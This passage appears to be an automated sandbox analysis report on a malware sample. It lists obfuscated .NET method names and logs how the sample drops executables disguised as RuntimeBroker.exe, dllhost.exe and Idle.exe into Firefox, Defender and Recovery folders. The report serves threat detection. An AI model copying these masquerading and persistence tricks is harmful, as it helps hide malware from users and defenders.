                              Source: 4Osfx7gnSx.exe, JjF0SuU7TN8BP7HCXFo.csHigh entropy of concatenated method names: 'MVvUcRIaFZ', 'zmhU1PNJbt', 'Am4pX3AZpTmcu43pR3sN', 'gYIIrKAZAbH1yyLm7pMj', 's7flGDAZU8Puo8LLhHWl', 'PW98qnAZaZxGbRja0kxN', 'MqbuTPAZi6GCWbK1ejY0', 'vYQk1iAZHyJ32W3XdYDR', 'D4LDqPAZI6Uxxw89317Z'
                              Source: 4Osfx7gnSx.exe, IxUVOeO61yW8UpwCIVx.csHigh entropy of concatenated method names: 'fCyODyPxcI', '_64r', '_69F', '_478', 'W4VOukCvlb', '_4D8', 'SuZO2Tb25F', 'vIEOWONSrn', '_4qr', 'X27Olny7EB'
                              Source: 4Osfx7gnSx.exe, SjnyZPepaBeartFOwiC.csHigh entropy of concatenated method names: 'nyXeii9M53', 'UfAeHlwnMW', 'WTleIJLkb6', 'X0ge6DmR5R', 'RWteVsM6LJ', 'R4x3p1AjhhWMtw57VMt3', 'ciF3SpAjjuNyY2nnwG3I', 'WXx9aAAjqmBGrHeSDGJj', 'q75JXiAj8WJVRDqhUsH6', 'SGPYflAjtrJiLtYO0Nem'
                              Source: 4Osfx7gnSx.exe, YuF5ELV33od74QpDWUU.csHigh entropy of concatenated method names: 'BeBVofYi5A', 'OicRjAAbuIeYRbQlRXAu', 'KCMBcEAbVALguYfVrhPC', 'sdt5V9AbDYmnunnBFb4M', 'mN5ygWAb2aQbq8jKO9On', 'WE7c4PAbWoDTaAuHXasg', 'UU8', 'd65', 'nH9AalSdtI8', 'U4mAaRvrnvy'
                              Source: 4Osfx7gnSx.exe, ujTSw2eDAfEarn8xtrL.csHigh entropy of concatenated method names: 'GDge2clgFH', 'S1AeWU0u8W', 'jvlelYAS7D', 'wsfKoLAjdaJLcnc49p76', 'Y7GeVRAj9vd1do36EmFO', 'U86sPNAjQc9mP16iP09p', 'ul2QDbAjfZCjXeOxtgS2', 'KGpYTCAjKXBAuiIV86f5'
                              Source: 4Osfx7gnSx.exe, oOfHxtevufxlC1sG9fP.csHigh entropy of concatenated method names: 'Xr6eQw2nfC', 'a4Yed8B0RL', 'uxcefxmCYd', 'NxveKo4FS5', 'M3BesiITZT', 'LYBeXmk62E', 'dagezbJGTG', 'DRrZGNkIeq', 'zqeZATRNqB', 'f8vZUJ9CMj'
                              Source: 4Osfx7gnSx.exe, ELjKuveyjH1NdX3Dx0W.csHigh entropy of concatenated method names: 'QlMe11BSuD', 'NQFex8R99I', 'oFDenx5FxO', 'LbTekIQmlL', 'uOGe4XPiHt', 'JpueCMVAbQ', 'z1lapYAqiolWR4lgD4jO', 'hlWJZwAqp9BW6aE4i8TC', 'oHn9EkAqaBGewCfwkCsW', 'QBAfsxAqHdsg7slI59Ht'
                              Source: 4Osfx7gnSx.exe, PwSUNEaOrlQ4mcxMfdO.csHigh entropy of concatenated method names: 'x3YaE9poFV', 'tbeaJgEPRF', 'NFQRk3A31BGGf7mJJEF5', 'pLpSJ7A3xoTe9gmDqLn0', 'PYDZWyA3nmfdiL3IrI9g', 'mQWPXiA3k8y3ex68tLuP', 'P2kXtbA345ZOYH8uB8yg', 'SbP0AKA3COOtaQxbyTds', 'DphWo6A3PZ4jRsUMEkiv'
                              Source: 4Osfx7gnSx.exe, Vk8yc8m4F342nsQEGPq.csHigh entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
                              Source: 4Osfx7gnSx.exe, KV7JE9pDrPH7bHOysO4.csHigh entropy of concatenated method names: 'mxIp2YkVD8', 'nxOpWCtFGR', 'cp8plFxjt3', 'BlU4wgAZvtnOLVr97hFC', 'C9OnqJAZtsPJ1PwV0Aqv', 'u2byauAZNn7kqybyJTRX', 'g45s8VAZ94ueanTkWbAu', 'KFOWvnAZQAcyY67kYNFr', 'Fx8jJiAZdnk1wbiE8gK7', 'mghe0eAZftvYwCRgucxV'
                              Source: 4Osfx7gnSx.exe, mQHhJDVFDAUXnYTouO3.csHigh entropy of concatenated method names: '_816', 'd65', 'rq1AaI5WsfY', 'hivAa6M9EFf', 'hRLA6kdGNwu', 'qRKAaGuRsxb', 'o4W29sAO8ikaEnO0H5MR', 'LStleGAOqf7YXuuHSf28', 'n2PHS7AOhRpWocO8ZofQ', 'nnLqwfAOtrSj6NvRWyoS'
                              Source: 4Osfx7gnSx.exe, IkG57neRxveEjfmOe41.csHigh entropy of concatenated method names: 'gI8eTxxsj9', 'Q2YemYHd44', 'oYJeFvi25T', 'rfQuBuAjXWwFqwe2SKqk', 'uAp7W3AjztdL68NOC174', 'edhEjFAqGc3NbD1Iehw0', 'SLTlcnAqAIrC0JJsYywX'
                              Source: 4Osfx7gnSx.exe, EP18t8N3v8lbx25xenr.csHigh entropy of concatenated method names: 'AhVNr9c8S4', 'dEDNJoVZ8w', 'mOgNLiwVpQ', 'RykN5UigcX', 'QfmN0pnHn7', 'WMDNBmdpcm', 'KyANjKrkLe', 'f8UNqNeNKq', '_0023Nn', 'Dispose'
                              Source: 4Osfx7gnSx.exe, oncnJfiWp1yK0ZdQeM7.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'q1kA6c5NsCy', 'WBxApz0sEhg', 'r833H2ASppK8QSDaTC4p', 'WX2lpMASaHVHSOTpIECO', 'QbkmVTASiO6gGlV3BI0k', 'rSJ6lOASHT1Oky6N2vaf', 'FwdgwbASIjHfZu2PGs4E'
                              Source: 4Osfx7gnSx.exe, s1Hc35phQoHfpSR4eRT.csHigh entropy of concatenated method names: 'qvdpvpA0rq', 'B9WcgAAYZKWHlDbokse3', 'ox4pbrAYPuLioURyhrfi', 'zU6fonAYeETPohiSjHJJ', 'Xa5ptJwqfH', 'iRyroMAYkBp5OEosnBxP', 'f9QoaXAY4ACyKVSpf9BD', 'xFgDq0AYxIcN4jswEVpF', 'YvDyTfAYnxfY5t5LdC7D'
                              Source: 4Osfx7gnSx.exe, MXCya7EFT70nsTfbHSm.csHigh entropy of concatenated method names: 'YksEydbRdl', 'lI9EcWEXF4', 'NJVE17aVX0', 'BaIExddMTL', 'B57EnDXvo8', 'am6EkQSqfu', 'YOGE4qs8JY', 'sMlECY9Zkk', 'AtNEPh0w4b', 'C65EeoXds5'
                              Source: 4Osfx7gnSx.exe, bJXpMtpTGFsV4cQKNkU.csHigh entropy of concatenated method names: 'k9ipefQc1R', 'E8fpZjNGCS', 'ItnpYVDHEP', 'xxN2myAYuwvRHThr4D9S', 'BjhDjEAYV9rGJJngjcRx', 'aQpEhmAYDsba6kDEFmA6', 'ByVQUXAY24OkOuPO5wsK', 'sCFpk37Lry', 'Dokp4egtru', 'OclakaAYHnKKB7XX5i8I'
                              Source: 4Osfx7gnSx.exe, q554EXSH6J16TeBJv5u.csHigh entropy of concatenated method names: 'fQfK86AtkwDWw8VGCGae', 'vlREGbAt4jOAJYfweugE', 'Hg9BdRAtCeTsybiAqpGr', 'h9MS6T7FPi', '_1R8', '_3eK', 'fOfSV6qZDK', 'oeYSDiSoAj', 'UtNSuaaibL', 'SIOS28nwsS'
                              Source: 4Osfx7gnSx.exe, sOUGMTrh1D6PtGSAew1.csHigh entropy of concatenated method names: '_25r', 'h65', 'JGfrtc07BN', 'y08rN4Djhs', 'MFarvVoDHN', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
                              Source: 4Osfx7gnSx.exe, kOjBYXTxDHf71hNCxrG.csHigh entropy of concatenated method names: 'yLNTjEKkF4', 'hsWTkPadRZ', 'iSaT4DNjpm', 'UL6TCkaIUj', 'BhNTP0oBtb', 'jGlTeYOyiH', 'k8cTZYqmaI', 'wFvTYrEBdh', 'NX8T37NPIt', 'eytTSIxZF4'
                              Source: 4Osfx7gnSx.exe, VV3cmv9XLL3yjgxRKHD.csHigh entropy of concatenated method names: 'u95QU9ZGKd', 'hq3Qp0cL0A', 'mrogiSAK4hnhKlHKNYqs', 'gNs0jnAKnYyBItsGbPAM', 'nJDkbGAKkxXG8ZKvDm0n', 'UuOga4AKChYGSXhLVfpH', 'hWtlyaAKPVhupsvL1B5b', 'LjKQGAUv9g', 'QEdddwAKys75DerlrheR', 'mgJxAlAKcsu1buUk6v8g'
                              Source: 4Osfx7gnSx.exe, zNBLoyDguXtXySocwYb.csHigh entropy of concatenated method names: '_5t1', 'd65', 'nH1AaCyv9lJ', 'Kl8AaPxKTcS', 'dB8DmxmhdQ', 'MKKA6MEn4aQ', 'qRKAaGuRsxb', 'Ufd7g4Ab96Rjhp5ERl2l', 'M2QE56AbQkiaek2SeOFR', 'CUHheHAbdgvtHdEypecd'
                              Source: 4Osfx7gnSx.exe, axvIOElSkPj8HJtaDyc.csHigh entropy of concatenated method names: 'j9l', 'EeAlrq5mhi', 'wuGlOv7pCZ', 'kXUlbXVuwo', 'YcwlEOMXbN', 'LSQlJxXiVE', 'QN1lwi7REs', 'ac1YqjAw4smKvg8y4B1l', 'owgX6GAwnXKA1I2crs67', 'L9RsleAwkSfyTO6Ky4Iy'
                              Source: 4Osfx7gnSx.exe, y2iQmXpQNC7vJL6yIvv.csHigh entropy of concatenated method names: 'UVjpfYxDh9', 'JLUUpwAYMeXXPwhoXLBK', 'rRf6o2AYrD9rf61Hn4bV', 'PfOaeBAYOEjflUQovcFi', 'nCjNAPAYb3GQL4WEm5ER', 'y8hNOpAY3qpswIYAPu6G', 'NQXvqeAYSNvMrwCe0MMZ', 'O8BZlBAYE405o1lUv3IQ'
                              Source: 4Osfx7gnSx.exe, eCuEtJiqiXlfJ0YDYVJ.csHigh entropy of concatenated method names: 'nMiiKlwrpe', 'zYxishPmJV', 'Lm4tsaASE9lu4tVuPasp', 'LPpjIOASO2EhSafOyt9Z', 'Uyhnl0ASbC6Bi6ZsmR9n', 'sN18wJASJCw0klW2ea0F', 'u0UHACcUaZ', 'If61B7AS51IA9ZDbd2ZQ', 'dQ7Fk4AS0YvrPIYJixeK', 'HCdVRuASog6FC9L50RnU'
                              Source: 4Osfx7gnSx.exe, rEX4FVUgeKo38wwDa83.csHigh entropy of concatenated method names: 'eBrUmpX8XG', 'OLoUFyowFi', 'rXAJ9QAefwofR5BZHvVh', 'vVbOdgAeQbPVMuYU9k0o', 'KGSPhtAedLGSU0wgTsv7', 't7IZq3AeK4Prqxmv1j4E', 'nsTLZhAesAw0NZNyAeht', 'kywyguAeXpi4O15wwS9f', 'wtyD0nAezEqqk1mQlo2m'
                              Source: 4Osfx7gnSx.exe, MV6uv6uHEGcrn5mrPdp.csHigh entropy of concatenated method names: 'xYc0elAJWB05R8gEbQOP', 'MP8wWKAJlm9q7CgDYDuk', 'OQj4wnAJRyTktv1h7bHh', 'LYgHHlAJud5rqYfZjIA8', 'wCCwtJAJ2Z0V2Y31GmoA', '_7kT', '_376', 'TFou66Muiq', 'lIIuVTI5sn', '_4p5'
                              Source: 4Osfx7gnSx.exe, v2F0sGUYXHbFAw2uJ4Z.csHigh entropy of concatenated method names: 'wcWUoNwSEZ', 'GQ4vpPAZyKulXauLQJC6', 'gpjXwbAZFdJ02vblK1VR', 'VqZQNcAZ7rJGuIwWZV9M', 'tQHhWTAZc9Jn4Nhd5Fn6', 'mylK4hAZ1gbt5vTQ79bO', 'i6MUSsoVxR', 'Ds3UMMdpp5', 'V86UrQIdDM', 'zGbUOjiX5k'
                              Source: 4Osfx7gnSx.exe, NgwoHQiaF2w7DJNUmqP.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'wjZiHQm30F', 'fwoiIg2Xsq', 'FQsi6mutC1', 'DD7VuuA38ncfCtpkj3Hs', 'Lh02BCA3ttM2RjqSWjNc', 'FTFdK3A3NiwlACFX6yEL', 'lIk0TZA3vuVQTPi0gEkU', 'YaSoU5A39T4C5e24hV4d'
                              Source: 4Osfx7gnSx.exe, oeuc5BDVX9qcXrfibdW.csHigh entropy of concatenated method names: 'd5nDl26eTp', 'wA5S82Abtl1ROVTMXr3N', 'oaimnkAbh6HuyPLCq65g', 'e2XenCAb8jNm1UALmDvh', 'ETuBw8AbNlshEepp6jCF', '_53Y', 'd65', 'FD9AanKZljb', 'RKlAakpnsGK', 'uqTA6Scos94'
                              Source: 4Osfx7gnSx.exe, XHOIf0zqFJecwXsa9G.csHigh entropy of concatenated method names: 'BJUAAxaaRu', 'DWNApeh8tX', 'WOOAaS1Opq', 'E0cAilK51T', 'PPvAHZV2kN', 'AqxAIin3lc', 'SU7AVVRxHJ', 'mpmsQRAPCwuC5i2MN1FY', 'C3viV5APP3O9cSrvFglQ', 'RowRtDAPedvlRkLVq2ol'
                              Source: 4Osfx7gnSx.exe, S76HAhN4Kx8SCuYP6Ky.csHigh entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'pIxNPVs45r', 'nbWgnBAdT3LXxtjHp00e', 'obbaUaAdmgIOGBxhcNVD', 'Khquw9AdFLUDcd1Fs0dK', 'VqOnjIAd7Srtqii7hewT', 'pK1YqTAdyj4PG6aaDt3r', 'bQRToNAdcghToN7BLRYl'
                              Source: 4Osfx7gnSx.exe, mj5vVuQ2KALsc9vu7X2.csHigh entropy of concatenated method names: 'stXQlgtLFx', 'xsbQRscgK4', 'drUQgd7jhu', 'lQvQTp42xE', 'HcAQmNLYoP', 'wxmQFh9pb1', 'qaQAtGAKOpA1D033YF2Z', 'yviROCAKbUiernNXG5N4', 'FnZ2RUAKEBk4NMj8hDnu', 'oUrymRAKJqdPaRuLbPf1'
                              Source: 4Osfx7gnSx.exe, ksC6g9a4QkqSuiOMutB.csHigh entropy of concatenated method names: 'DHoaPDEnHW', 'is1aeEE10N', 'QtyaZhEjWg', 'BB2aYdK2yc', 'Vam87sA3gak4mnC9FX5J', 'IEhLK9A3lmLsQHKdHUdB', 'Sxsar3A3RckPAOInTCtC', 'oERoikA3TxoN4nchyRYW', 'iCNuciA3mw2Fypl45OCK', 'INnrcBA3F6p9gqHliePR'
                              Source: 4Osfx7gnSx.exe, iibBUVDfRZ9d8sb0hAw.csHigh entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'vcDDse7OiU', 'mkPA6LNwpUv', 'jmBDX8InWt', 'ANYA658r80J', 'L37bmaAE0iSSnvMlfQXD', 'eheQW6AELOg7X3dFFX73', 'st2fpvAE52KAp5ThrkbD'
                              Source: 4Osfx7gnSx.exe, m0aDECpsR409hSvag60.csHigh entropy of concatenated method names: 'c8waR2Mt3g', 'vURhLaA3UNgPYFD3ZNeA', 'zJKRPZA3pkDE3UxLfSl6', 'zRJJ9mA3GwtiUQN3WDoD', 'PEs7QOA3AickiM2QU4eM', 'a7OQAeA3i0a5M0knV0Ug', 'GA1dW3A3HAXVoXEaJjYS', 'qW4ax2ljGU', 'fCvaJdA3Dl1N680YnYVp', 'cHuoLtA36U0CA51MWHW0'
                              Source: 4Osfx7gnSx.exe, uhqdn4aNCq8q5ut5Bel.csHigh entropy of concatenated method names: 'hKlasx0qWy', 'drgaXd5kK8', 'Sslaz37DqH', 'FtYJLhA3qF0fjRSX9yR6', 'bWOVbbA3BH3ND8Y8M3Lk', 'ztasErA3jCLx8A58EPs5', 'xkOa9O4USV', 'Sf4aQgEX9g', 'H8WadkM8Lo', 'JEQRUiA3w5j3cGV6OOQI'
                              Source: 4Osfx7gnSx.exe, opAcA7xbeMp6loXa38D.csHigh entropy of concatenated method names: 'B1WP4gi00c', 'bO4PCSygyJ', 'iiGWFxAjxQOpLGaMMFQO', 'fM9mpKAjco3HKettCnZ3', 'NIMy56Aj1CPiCNXmnmEE', 'iFvWRFAjnEsNViRttFiJ', 'HmhRpvAjkF3n00n5q2KQ', 'sqLPS4n7Cd', 'cjia8aAjCTXkPbSxxR7b', 'wAhBkjAjPyhEw229nS3C'
                              Source: 4Osfx7gnSx.exe, dkvv64aoH7u5GAvaUMu.csHigh entropy of concatenated method names: 'FU9a8IKLV9', 'GJl7mLA3EAUuX8iHWyeT', 'wd8LpgA3Ok0oio75VJYY', 'RGaMwLA3bnsKZK49qYY9', 'Qeda5CIAAw', 'tL2a0tJn3b', 'sdBaB10sNq', 'QR5CpFA3303Hkba5oi69', 'P5P9VQA3SBoPXKbaFswG', 'CWq7shA3Z2PYCHbc52VH'
                              Source: 4Osfx7gnSx.exe, iB4cRp3GFBaAcGOMil2.csHigh entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
                              Source: 4Osfx7gnSx.exe, CmZofiV0Oxte8MNICgK.csHigh entropy of concatenated method names: 'IDV', 'd65', 'JuwA6eLUIsF', 'qRKAaGuRsxb', 'IqBVjNEytE', 'gyyrVhAbRuSfiECvXT1p', 'cGQL7gAbgWNhjyNkiutM', 'lIRaytAbTs8WBQS0LlHM', 'JuWHnXAbmy0dE5NyM9qV', 'w4MIy1AbFsDYDSUl7g1w'
                              Source: 4Osfx7gnSx.exe, bTgRxkAoBNElWDS7763.csHigh entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'pspA6m71JEi', 'OaCAptYfiN1', 'rfhAHcAeusTTXc5y77ST', 'oaiqCYAe2X7uukmccX89', 'De5lKkAeWm0oC2d6gVrS'
                              Source: 4Osfx7gnSx.exe, QmrENivaLHceBCRtxRi.csHigh entropy of concatenated method names: 'EvSvHIsEpO', 'PA2vIRxs24', 'WRYv67ZgNH', 'Xm8vVxQUBq', '_0023Nn', 'Dispose', 'AnW437AdjiWOyF5MusNP', 'EQHtCIAd0uR7DVwbdGoq', 'iSkLcdAdBDpgxEIaaX4T', 'n9MaufAdqneeGt6OvRj1'
                              Source: 4Osfx7gnSx.exe, vjvJw6R7P3xZ5VtZVsS.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'C5DRcbKIkI', '_947', 'J7mR1bAVDm', 'X2SRxDptY8', '_1f8', '_71D'
                              Source: 4Osfx7gnSx.exe, Q2inVbDJdXATnOJTJ4H.csHigh entropy of concatenated method names: '_2SY', 'vaIA6biBwLH', 'SYyDokgZqp', 'pKCA6Enj3Z2', 'IQc8IqAEc8SCpuogIhhh', 'EFUpBYAE1EsIpCuOfOks', 'Y34uJjAE7tSeZp6WqG36', 'moldyZAEyJNns1HrW4B4', 'yfk8w6AExeMB16caNr4l', 'g29PhHAEnby8BiiAAVw2'
                              Source: 4Osfx7gnSx.exe, H58RR2ACYLGZjkDmo23.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'LFcA6gf6Us6', 'OaCAptYfiN1', 'dqlN9yAPvwEeRqia86kL', 'rmlyaIAP9AUJi66qbFwv', 'pMFQ5HAPQyki0XqkUpDf'
                              Source: 4Osfx7gnSx.exe, g1xUlAHBnvYYQ5DcAsb.csHigh entropy of concatenated method names: 'FROIGiUoY6', 'PetIAlQWZj', 'NeyIUPidve', 'eJuIbnAMtjlcOMYFRjjR', 'DDUGcHAMhqJKGYTwhp10', 'CmKNfEAM81l0suFVc647', 'iNOHqdZQ3E', 'J7UHhPLnnO', 'iMaH826OsZ', 'GnFHtPXTfv'
                              Source: 4Osfx7gnSx.exe, WwGe4ifcPPb7HU3ojZ3.csHigh entropy of concatenated method names: 'xvafXuAsRny6EwwxjPZ6', 'FNN6p9AsgDwPN99O9iT0', 'AxsKKfLGFM', 'nlvTieAs7iK3UQuuOk6q', 'WWLS3AAsycghKnYS97VO', 'xPAEPWAscsXFBCdU2Hb3', 'ua15cqAs1WB0F8kMtPuh', 'cbGKhQAsx9dIM1e3GdLi', 'vMsrINAsnwRHav3GNd47', 'GZtO3jAskuPo8mAvHju1'
                              Source: 4Osfx7gnSx.exe, K8JRIS3S4UoB2VBpbFQ.csHigh entropy of concatenated method names: 'xGZ3rCF47m', 'eg73OblbqA', 'KAy3bOBPgx', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'gp03EFdLKR'
                              Source: 4Osfx7gnSx.exe, p9phs6maPKZPmIfJZi.csHigh entropy of concatenated method names: 'Ax5rCcVxx', 'nOirs8AC9wLdsbmSqdvC', 'BKTn9DACQe4xeHtYDttB', 'fVbRfJACNVKkYt5eCR3g', 'JEOq0xACv90JZhOIFqeQ', 'm0471P6y5', 'jUcypDyPO', 'PWKc3CNc7', 'CPL1gxoW5', 'fMmxMjMTw'

                              Persistence and Installation Behavior

                              barindex
                              Drops executable to a common third party application directory
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile written: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile created: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeJump to dropped file
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exeJump to dropped file
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile created: C:\Program Files (x86)\Microsoft.NET\Idle.exeJump to dropped file
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile created: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
